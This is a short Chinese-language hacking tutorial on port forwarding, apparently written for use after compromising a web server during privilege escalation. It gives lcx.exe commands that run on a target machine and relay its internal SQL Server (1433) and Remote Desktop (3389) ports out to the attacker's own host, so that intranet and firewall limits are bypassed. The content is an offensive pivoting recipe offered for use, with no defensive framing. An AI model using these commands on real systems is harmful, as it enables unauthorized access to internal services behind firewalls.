主题：端口转发

内容：

提权前的时候我们只要发现目标机支持asp.net，php

1.适用环境：

1>.对方是内网    我们要去做端口映射本机必须是外网。

2>.对方有防火墙挡着无法从外部连接。

2.利用端口转发工具

本节以lcx.exe演示。

目标机：lcx.exe -slave 本机IP 51 目标机IP 1433
        把目标机的1433转发到自己的51端口

本机：  lcx.exe -listen 51 1433
        监听本机51端口将数据转发到本机1433端口

那么直接连接本机的1433实际就是连接的目标机的1433，因为他的端口已经被转发出来。所以没了内网和防火墙的限制，我们可以直接连接。

其他都都一样。只要是我们要向目标机发起连接而对方是内网或者是被档着我们都可以做端口的转发解决这个问题。

lcx.exe -slave 本机IP 61 目标机IP 3389
lcx.exe -listen 61 5566